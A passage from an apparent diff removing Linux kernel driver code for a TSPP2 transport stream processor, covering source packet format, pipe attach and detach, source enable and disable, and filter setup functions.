--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--	if (!cfg) {
--		pr_err("%s: NULL pointer\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&src->device->mutex)) {
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EINVAL;
--	}
--
--	reg = readl_relaxed(src->device->base +
--			TSPP2_SRC_CONFIG(src->hw_index));
--
--	cfg->scrambling_0_ctrl = ((reg >> SRC_CONFIG_SCRAMBLING0_OFFS) & 0x3);
--	cfg->scrambling_1_ctrl = ((reg >> SRC_CONFIG_SCRAMBLING1_OFFS) & 0x3);
--	cfg->scrambling_2_ctrl = ((reg >> SRC_CONFIG_SCRAMBLING2_OFFS) & 0x3);
--	cfg->scrambling_3_ctrl = ((reg >> SRC_CONFIG_SCRAMBLING3_OFFS) & 0x3);
--	cfg->scrambling_bits_monitoring =
--			((reg >> SRC_CONFIG_SCRAMBLING_MONITOR_OFFS) & 0x3);
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_src_scrambling_config_get);
--
--/**
-- * tspp2_src_packet_format_set() - Set source packet size and format.
-- *
-- * @src_handle:	Source to configure.
-- * @format:	Packet format.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_packet_format_set(u32 src_handle,
--				enum tspp2_packet_format format)
--{
--	int ret;
--	u32 reg = 0;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&src->device->mutex)) {
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EINVAL;
--	}
--
--	if (src->input == TSPP2_INPUT_MEMORY) {
--		reg = readl_relaxed(src->device->base +
--			TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
--
--		reg &= ~(0x1 << MEM_INPUT_SRC_CONFIG_STAMP_SUFFIX_OFFS);
--		reg &= ~(0x1 << MEM_INPUT_SRC_CONFIG_STAMP_EN_OFFS);
--
--		switch (format) {
--		case TSPP2_PACKET_FORMAT_188_RAW:
--			/* We do not need to set any bit */
--			break;
--		case TSPP2_PACKET_FORMAT_192_HEAD:
--			reg |= (0x1 << MEM_INPUT_SRC_CONFIG_STAMP_EN_OFFS);
--			break;
--		case TSPP2_PACKET_FORMAT_192_TAIL:
--			reg |= (0x1 << MEM_INPUT_SRC_CONFIG_STAMP_EN_OFFS);
--			reg |= (0x1 << MEM_INPUT_SRC_CONFIG_STAMP_SUFFIX_OFFS);
--			break;
--		default:
--			pr_err("%s: Unknown packet format\n", __func__);
--			mutex_unlock(&src->device->mutex);
--			pm_runtime_mark_last_busy(src->device->dev);
--			pm_runtime_put_autosuspend(src->device->dev);
--			return -EINVAL;
--		}
--		writel_relaxed(reg, src->device->base +
--			TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
--	}
--	src->pkt_format = format;
--
--	/* Update source's input pipe threshold if needed */
--	if (src->input_pipe) {
--		if (src->pkt_format == TSPP2_PACKET_FORMAT_188_RAW)
--			src->input_pipe->threshold = 188;
--		else
--			src->input_pipe->threshold = 192;
--
--		writel_relaxed(src->input_pipe->threshold,
--			src->input_pipe->device->base +
--			TSPP2_PIPE_THRESH_CONFIG(src->input_pipe->hw_index));
--	}
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_src_packet_format_set);
--
--/**
-- * tspp2_src_pipe_attach() - Attach a pipe to a source.
-- *
-- * @src_handle:		Source to attach the pipe to.
-- * @pipe_handle:	Pipe to attach to the source.
-- * @cfg:		For output pipes - the pipe's pull mode parameters.
-- *			It is not allowed to pass NULL for output pipes.
-- *			For input pipes this is irrelevant and the caller can
-- *			pass NULL.
-- *
-- * This function attaches a given pipe to a given source.
-- * The pipe's mode (input or output) was set when the pipe was opened.
-- * An input pipe can be attached to a single source (with memory input).
-- * A source can have multiple output pipes attached, and an output pipe can
-- * be attached to multiple sources.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_pipe_attach(u32 src_handle,
--				u32 pipe_handle,
--				const struct tspp2_pipe_pull_mode_params *cfg)
--{
--	int ret;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--	struct tspp2_pipe *pipe = (struct tspp2_pipe *)pipe_handle;
--	struct tspp2_output_pipe *output_pipe = NULL;
--	u32 reg;
--
--	if (!src || !pipe) {
--		pr_err("%s: Invalid source or pipe handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&src->device->mutex)) {
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		goto err_inval;
--	}
--
--	if (!pipe->opened) {
--		pr_err("%s: Pipe not opened\n", __func__);
--		goto err_inval;
--	}
--	if ((pipe->cfg.pipe_mode == TSPP2_SRC_PIPE_OUTPUT) && (cfg == NULL)) {
--		pr_err("%s: Invalid pull mode parameters\n", __func__);
--		goto err_inval;
--	}
--
--	if (pipe->cfg.pipe_mode == TSPP2_SRC_PIPE_INPUT) {
--		if (src->input_pipe != NULL) {
--			pr_err("%s: Source already has an input pipe attached\n",
--				__func__);
--			goto err_inval;
--		}
--		if (pipe->ref_cnt > 0) {
--			pr_err(
--				"%s: Pipe %u is already attached to a source. An input pipe can only be attached once\n",
--				__func__, pipe_handle);
--			goto err_inval;
--		}
--		/*
--		 * Input pipe threshold is determined according to the
--		 * source's packet size.
--		 */
--		if (src->pkt_format == TSPP2_PACKET_FORMAT_188_RAW)
--			pipe->threshold = 188;
--		else
--			pipe->threshold = 192;
--
--		src->input_pipe = pipe;
--
--		reg = readl_relaxed(src->device->base +
--			TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
--		reg &= ~(0x1F << MEM_INPUT_SRC_CONFIG_INPUT_PIPE_OFFS);
--		reg |= (pipe->hw_index << MEM_INPUT_SRC_CONFIG_INPUT_PIPE_OFFS);
--		writel_relaxed(reg, src->device->base +
--			TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
--	} else {
--		list_for_each_entry(output_pipe,
--				&src->output_pipe_list, link) {
--			if (output_pipe->pipe == pipe) {
--				pr_err(
--				"%s: Output pipe %u is already attached to source %u\n",
--					__func__, pipe_handle, src_handle);
--				goto err_inval;
--			}
--		}
--		output_pipe = kmalloc(sizeof(struct tspp2_output_pipe),
--				GFP_KERNEL);
--		if (!output_pipe) {
--			pr_err("%s: No memory to save output pipe\n", __func__);
--			mutex_unlock(&src->device->mutex);
--			pm_runtime_mark_last_busy(src->device->dev);
--			pm_runtime_put_autosuspend(src->device->dev);
--			return -ENOMEM;
--		}
--		output_pipe->pipe = pipe;
--		pipe->threshold = (cfg->threshold & 0xFFFF);
--		list_add_tail(&output_pipe->link, &src->output_pipe_list);
--
--		reg = readl_relaxed(src->device->base +
--			TSPP2_SRC_DEST_PIPES(src->hw_index));
--		if (cfg->is_stalling)
--			reg |= (0x1 << pipe->hw_index);
--		else
--			reg &= ~(0x1 << pipe->hw_index);
--		writel_relaxed(reg, src->device->base +
--			TSPP2_SRC_DEST_PIPES(src->hw_index));
--	}
--
--	reg = readl_relaxed(pipe->device->base +
--			TSPP2_PIPE_THRESH_CONFIG(pipe->hw_index));
--	if ((pipe->cfg.pipe_mode == TSPP2_SRC_PIPE_OUTPUT) &&
--		(pipe->ref_cnt > 0) && (pipe->threshold != (reg & 0xFFFF))) {
--		pr_warn("%s: overwriting output pipe threshold\n", __func__);
--	}
--
--	writel_relaxed(pipe->threshold, pipe->device->base +
--			TSPP2_PIPE_THRESH_CONFIG(pipe->hw_index));
--
--	pipe->ref_cnt++;
--	src->num_associated_pipes++;
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--
--err_inval:
--	mutex_unlock(&src->device->mutex);
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	return -EINVAL;
--}
--EXPORT_SYMBOL(tspp2_src_pipe_attach);
--
--/**
-- * tspp2_src_pipe_detach() - Detach a pipe from a source.
-- *
-- * @src_handle:		Source to detach the pipe from.
-- * @pipe_handle:	Pipe to detach from the source.
-- *
-- * Detaches a pipe from a source. The given pipe should have been previously
-- * attached to this source as either an input pipe or an output pipe.
-- * Note: there is no checking if this pipe is currently defined as the output
-- * pipe of any operation!
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_pipe_detach(u32 src_handle, u32 pipe_handle)
--{
--	int ret;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--	struct tspp2_pipe *pipe = (struct tspp2_pipe *)pipe_handle;
--	struct tspp2_output_pipe *output_pipe = NULL;
--	int found = 0;
--	u32 reg;
--
--	if (!src || !pipe) {
--		pr_err("%s: Invalid source or pipe handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	mutex_lock(&src->device->mutex);
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		goto err_inval;
--	}
--
--	if (!pipe->opened) {
--		pr_err("%s: Pipe not opened\n", __func__);
--		goto err_inval;
--	}
--
--	if (pipe->cfg.pipe_mode == TSPP2_SRC_PIPE_INPUT) {
--		if (src->input_pipe != pipe) {
--			pr_err(
--				"%s: Input pipe %u is not attached to source %u\n",
--				__func__, pipe_handle, src_handle);
--			goto err_inval;
--		}
--
--		writel_relaxed(0xFFFF,	src->input_pipe->device->base +
--			TSPP2_PIPE_THRESH_CONFIG(src->input_pipe->hw_index));
--
--		if (src->enabled) {
--			pr_warn("%s: Detaching input pipe from an active memory source\n",
--				__func__);
--		}
--		/*
--		 * Note: not updating TSPP2_MEM_INPUT_SRC_CONFIG to reflect
--		 * this pipe is detached, since there is no invalid value we
--		 * can write instead. tspp2_src_pipe_attach() already takes
--		 * care of zeroing the relevant bit-field before writing the
--		 * new pipe nummber.
--		 */
--
--		src->input_pipe = NULL;
--	} else {
--		list_for_each_entry(output_pipe,
--				&src->output_pipe_list, link) {
--			if (output_pipe->pipe == pipe) {
--				found = 1;
--				break;
--			}
--		}
--		if (found) {
--			list_del(&output_pipe->link);
--			kfree(output_pipe);
--			reg = readl_relaxed(src->device->base +
--				TSPP2_SRC_DEST_PIPES(src->hw_index));
--			reg &= ~(0x1 << pipe->hw_index);
--			writel_relaxed(reg, src->device->base +
--				TSPP2_SRC_DEST_PIPES(src->hw_index));
--			if (pipe->ref_cnt == 1) {
--				writel_relaxed(0xFFFF,	pipe->device->base +
--					TSPP2_PIPE_THRESH_CONFIG(
--							pipe->hw_index));
--			}
--		} else {
--			pr_err("%s: Output pipe %u is not attached to source %u\n",
--				__func__, pipe_handle, src_handle);
--			goto err_inval;
--		}
--	}
--	pipe->ref_cnt--;
--	src->num_associated_pipes--;
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--
--err_inval:
--	mutex_unlock(&src->device->mutex);
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	return -EINVAL;
--}
--EXPORT_SYMBOL(tspp2_src_pipe_detach);
--
--/**
-- * tspp2_src_enable() - Enable source.
-- *
-- * @src_handle:	Source to enable.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_enable(u32 src_handle)
--{
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--	u32 reg;
--	int ret;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&src->device->mutex)) {
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EINVAL;
--	}
--
--	if (src->enabled) {
--		pr_warn("%s: Source already enabled\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return 0;
--	}
--
--	/*
--	 * Memory sources require their input pipe to be configured
--	 * before enabling the source.
--	 */
--	if ((src->input == TSPP2_INPUT_MEMORY) && (src->input_pipe == NULL)) {
--		pr_err("%s: A memory source must have an input pipe attached before enabling the source",
--			__func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EINVAL;
--	}
--
--	if (src->device->num_enabled_sources == 0) {
--		ret = tspp2_clock_start(src->device);
--		if (ret) {
--			mutex_unlock(&src->device->mutex);
--			pm_runtime_mark_last_busy(src->device->dev);
--			pm_runtime_put_autosuspend(src->device->dev);
--			return ret;
--		}
--		__pm_stay_awake(&src->device->wakeup_src);
--	}
--
--	if ((src->input == TSPP2_INPUT_TSIF0) ||
--		(src->input == TSPP2_INPUT_TSIF1)) {
--		tspp2_tsif_start(&src->device->tsif_devices[src->input]);
--
--		reg = readl_relaxed(src->device->base +
--			TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
--		reg |= (0x1 << TSIF_INPUT_SRC_CONFIG_INPUT_EN_OFFS);
--		writel_relaxed(reg, src->device->base +
--			TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
--	} else {
--		reg = readl_relaxed(src->device->base +
--			TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
--		reg |= (0x1 << MEM_INPUT_SRC_CONFIG_INPUT_EN_OFFS);
--		writel_relaxed(reg, src->device->base +
--			TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
--	}
--
--	src->enabled = 1;
--	src->device->num_enabled_sources++;
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_src_enable);
--
--/**
-- * tspp2_src_disable() - Disable source.
-- *
-- * @src_handle:	Source to disable.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_disable(u32 src_handle)
--{
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--	int ret;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	mutex_lock(&src->device->mutex);
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	ret = tspp2_src_disable_internal(src);
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	if (!ret)
--		dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return ret;
--}
--EXPORT_SYMBOL(tspp2_src_disable);
--
--/**
-- *  tspp2_filter_ops_clear() - Clear filter operations database and HW
-- *
-- * @filter:	The filter to work on.
-- */
--static void tspp2_filter_ops_clear(struct tspp2_filter *filter)
--{
--	int i;
--
--	/* Set all filter operations in HW to Exit operation */
--	for (i = 0; i < TSPP2_MAX_OPS_PER_FILTER; i++) {
--		writel_relaxed(TSPP2_OPCODE_EXIT, filter->device->base +
--					TSPP2_OPCODE(filter->hw_index, i));
--	}
--	memset(filter->operations, 0,
--		(sizeof(struct tspp2_operation) * TSPP2_MAX_OPS_PER_FILTER));
--	filter->num_user_operations = 0;
--	filter->indexing_op_set = 0;
--	filter->raw_op_with_indexing = 0;
--	filter->pes_analysis_op_set = 0;
--	filter->raw_op_set = 0;
--	filter->pes_tx_op_set = 0;
--}
--
--/**
-- * tspp2_filter_context_reset() - Reset filter context and release it.
-- *
-- * @filter:	The filter to work on.
-- */
--static void tspp2_filter_context_reset(struct tspp2_filter *filter)
--{
--	/* Reset this filter's context. Each register handles 32 contexts */
--	writel_relaxed((0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
--		filter->device->base +
--			TSPP2_TSP_CONTEXT_RESET(filter->context >> 5));
--	writel_relaxed((0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
--		filter->device->base +
--			TSPP2_PES_CONTEXT_RESET(filter->context >> 5));
--	writel_relaxed((0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
--		filter->device->base +
--			TSPP2_INDEXING_CONTEXT_RESET(filter->context >> 5));
--
--	writel_relaxed(0, filter->device->base +
--		TSPP2_FILTER_ENTRY1(filter->hw_index));
--
--	/* Release context */
--	filter->device->contexts[filter->context] = 0;
--}
--
--/**
-- * tspp2_filter_sw_reset() - Reset filter SW fields helper function.
-- *
-- * @filter:	The filter to work on.
-- */
--static void tspp2_filter_sw_reset(struct tspp2_filter *filter)
--{
--	unsigned long flags;
--	/*
--	 * All fields are cleared when opening a filter. Still it is important
--	 * to reset some of the fields here, specifically to set opened to 0 and
--	 * also to set the callback to NULL.
--	 */
--	filter->opened = 0;
--	filter->src = NULL;
--	filter->batch = NULL;
--	filter->context = 0;
--	filter->hw_index = 0;
--	filter->pid_value = 0;
--	filter->mask = 0;
--	spin_lock_irqsave(&filter->device->spinlock, flags);
--	filter->event_callback = NULL;
--	filter->event_cookie = NULL;
--	filter->event_bitmask = 0;
--	spin_unlock_irqrestore(&filter->device->spinlock, flags);
--	filter->enabled = 0;
--}
--
--/**
-- * tspp2_src_batch_set() - Set/clear a filter batch to/from a source.
-- *
-- * @src:	The source to work on.
-- * @batch_id:	The batch to set/clear.
-- * @set:	Set/clear flag.
-- */
--static void tspp2_src_batch_set(struct tspp2_src *src, u8 batch_id, int set)
--{
--	u32 reg = 0;
--
--	if (src->input == TSPP2_INPUT_MEMORY) {
--		reg = readl_relaxed(src->device->base +
--			TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
--		if (set)
--			reg |= ((1 << batch_id) <<
--				MEM_INPUT_SRC_CONFIG_BATCHES_OFFS);
--		else
--			reg &= ~((1 << batch_id) <<
--				MEM_INPUT_SRC_CONFIG_BATCHES_OFFS);
--		writel_relaxed(reg, src->device->base +
--			TSPP2_MEM_INPUT_SRC_CONFIG(src->hw_index));
--	} else {
--		reg = readl_relaxed(src->device->base +
--			TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
--		if (set)
--			reg |= ((1 << batch_id) <<
--				TSIF_INPUT_SRC_CONFIG_BATCHES_OFFS);
--		else
--			reg &= ~((1 << batch_id) <<
--				TSIF_INPUT_SRC_CONFIG_BATCHES_OFFS);
--		writel_relaxed(reg, src->device->base +
--			TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
--	}
--}
--
--/**
-- * tspp2_src_filters_clear() - Clear all filters from a source.
-- *
-- * @src_handle:	Source to clear all filters from.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_filters_clear(u32 src_handle)
--{
--	int ret;
--	int i;
--	struct tspp2_filter *filter = NULL;
--	struct tspp2_filter *tmp_filter;
--	struct tspp2_filter_batch *batch = NULL;
--	struct tspp2_filter_batch *tmp_batch;
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	mutex_lock(&src->device->mutex);
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EINVAL;
--	}
--
--	/* Go over filters in source, disable them, clear their operations,
--	 * "close" them (similar to tspp2_filter_close function but simpler).
--	 * No need to worry about cases of reserved filter, so just clear
--	 * filters HW- and SW-wise. Then update source's filters and batches
--	 * lists and numbers. Simple :)
--	 */
--	list_for_each_entry_safe(filter, tmp_filter, &src->filters_list, link) {
--		/* Disable filter */
--		writel_relaxed(0, filter->device->base +
--			TSPP2_FILTER_ENTRY0(filter->hw_index));
--		/* Clear filter operations in HW as well as related SW fields */
--		tspp2_filter_ops_clear(filter);
--		/* Reset filter context-based counters */
--		tspp2_filter_counters_reset(filter->device, filter->context);
--		/* Reset filter context and release it back to the device */
--		tspp2_filter_context_reset(filter);
--		/* Reset filter SW fields */
--		tspp2_filter_sw_reset(filter);
--
--		list_del(&filter->link);
--	}
--
--	list_for_each_entry_safe(batch, tmp_batch, &src->batches_list, link) {
--		tspp2_src_batch_set(src, batch->batch_id, 0);
--		for (i = 0; i < TSPP2_FILTERS_PER_BATCH; i++)
--			batch->hw_filters[i] = 0;
--		batch->src = NULL;
--		list_del(&batch->link);
--	}
--
--	src->num_associated_batches = 0;
--	src->num_associated_filters = 0;
--	src->reserved_filter_hw_index = 0;
--
--	mutex_unlock(&src->device->mutex);
--
--	pm_runtime_mark_last_busy(src->device->dev);
--	pm_runtime_put_autosuspend(src->device->dev);
--
--	dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
--	return 0;
--}
--EXPORT_SYMBOL(tspp2_src_filters_clear);
--
--/* Filters and Operations API functions */
--
--/**
-- * tspp2_filter_open() - Open a new filter and add it to a source.
-- *
-- * @src_handle:		Source to add the new filter to.
-- * @pid:		Filter's 13-bit PID value.
-- * @mask:		Filter's 13-bit mask. Note it is highly recommended
-- *			to use a full bit mask of 0x1FFF, so the filter
-- *			operates on a unique PID.
-- * @filter_handle:	Opened filter handle.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_open(u32 src_handle, u16 pid, u16 mask, u32 *filter_handle)
--{
--	struct tspp2_src *src = (struct tspp2_src *)src_handle;
--	struct tspp2_filter_batch *batch;
--	struct tspp2_filter *filter = NULL;
--	u16 hw_idx;
--	int i;
--	u32 reg = 0;
--	int found = 0;
--	int ret;
--
--	if (!src) {
--		pr_err("%s: Invalid source handle\n", __func__);
--		return -EINVAL;
--	}
--	if (!filter_handle) {
--		pr_err("%s: Invalid filter handle pointer\n", __func__);
--		return -EINVAL;
--	}
--
--	if ((pid & ~0x1FFF) || (mask & ~0x1FFF)) {
--		pr_err("%s: Invalid PID or mask values (13 bits available)\n",
--			__func__);
--		return -EINVAL;
--	}
--
--	ret = pm_runtime_get_sync(src->device->dev);
--	if (ret < 0)
--		return ret;
--
--	if (mutex_lock_interruptible(&src->device->mutex)) {
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ERESTARTSYS;
--	}
--
--	if (!src->device->opened) {
--		pr_err("%s: Device must be opened first\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EPERM;
--	}
--
--	if (!src->opened) {
--		pr_err("%s: Source not opened\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -EINVAL;
--	}
--
--	/* Find an available filter object in the device's filters database */
--	for (i = 0; i < TSPP2_NUM_AVAIL_FILTERS; i++)
--		if (!src->device->filters[i].opened)
--			break;
--	if (i == TSPP2_NUM_AVAIL_FILTERS) {
--		pr_err("%s: No available filters\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ENOMEM;
--	}
--	filter = &src->device->filters[i];
--
--	/* Find an available context. Each new filter needs a unique context */
--	for (i = 0; i < TSPP2_NUM_AVAIL_CONTEXTS; i++)
--		if (!src->device->contexts[i])
--			break;
--	if (i == TSPP2_NUM_AVAIL_CONTEXTS) {
--		pr_err("%s: No available filters\n", __func__);
--		mutex_unlock(&src->device->mutex);
--		pm_runtime_mark_last_busy(src->device->dev);
--		pm_runtime_put_autosuspend(src->device->dev);
--		return -ENOMEM;
--	}
--	src->device->contexts[i] = 1;
--	filter->context = i;
--
--	if (src->num_associated_batches) {
--		/*
--		 * Look for an available HW filter among the batches
--		 * already associated with this source.
--		 */
--		list_for_each_entry(batch, &src->batches_list, link) {
--			for (i = 0; i < TSPP2_FILTERS_PER_BATCH; i++) {
--				hw_idx = (batch->batch_id *
--						TSPP2_FILTERS_PER_BATCH) + i;
--				if ((hw_idx != src->reserved_filter_hw_index) &&
--					(batch->hw_filters[i] == 0))
--					break;
--			}
--			if (i < TSPP2_FILTERS_PER_BATCH) {
--				/* Found an available HW filter */
--				batch->hw_filters[i] = 1;
--				found = 1;
--				break;
--			}
--		}
--	}
--
--	if (!found) {
--		/* Either the source did not have any associated batches,
--		 * or we could not find an available HW filter in any of
--		 * the source's batches. In any case, we need to find a new
--		 * batch. Then we use the first filter in this batch.
--		 */
--		for (i = 0; i < TSPP2_NUM_BATCHES; i++) {
--			if (!src->device->batches[i].src) {
--				src->device->batches[i].src = src;
--				batch = &src->device->batches[i];
--				batch->hw_filters[0] = 1;
--				hw_idx = (batch->batch_id *
--						TSPP2_FILTERS_PER_BATCH);
--				break;
--			}
--		}
--		if (i == TSPP2_NUM_BATCHES) {
--			pr_err("%s: No available filters\n", __func__);
--			src->device->contexts[filter->context] = 0;
--			filter->context = 0;
--			mutex_unlock(&src->device->mutex);
--			pm_runtime_mark_last_busy(src->device->dev);
--			pm_runtime_put_autosuspend(src->device->dev);
--			return -ENOMEM;
--		}
--
--		tspp2_src_batch_set(src, batch->batch_id, 1);
--
--		list_add_tail(&batch->link, &src->batches_list);
--
--		/* Update reserved filter index only when needed */
--		if (src->num_associated_batches == 0) {
--			src->reserved_filter_hw_index =
--				(batch->batch_id * TSPP2_FILTERS_PER_BATCH) +
--					TSPP2_FILTERS_PER_BATCH - 1;
--		}
--		src->num_associated_batches++;
--	}
--
--	filter->opened = 1;
--	filter->src = src;
--	filter->batch = batch;
--	filter->hw_index = hw_idx;
--	filter->pid_value = pid;
--	filter->mask = mask;
--	filter->indexing_table_id = 0;
--	tspp2_filter_ops_clear(filter);
--	filter->event_callback = NULL;
--	filter->event_cookie = NULL;
--	filter->event_bitmask = 0;
--	filter->enabled = 0;
--	/* device back-pointer is already initialized, always remains valid */
--
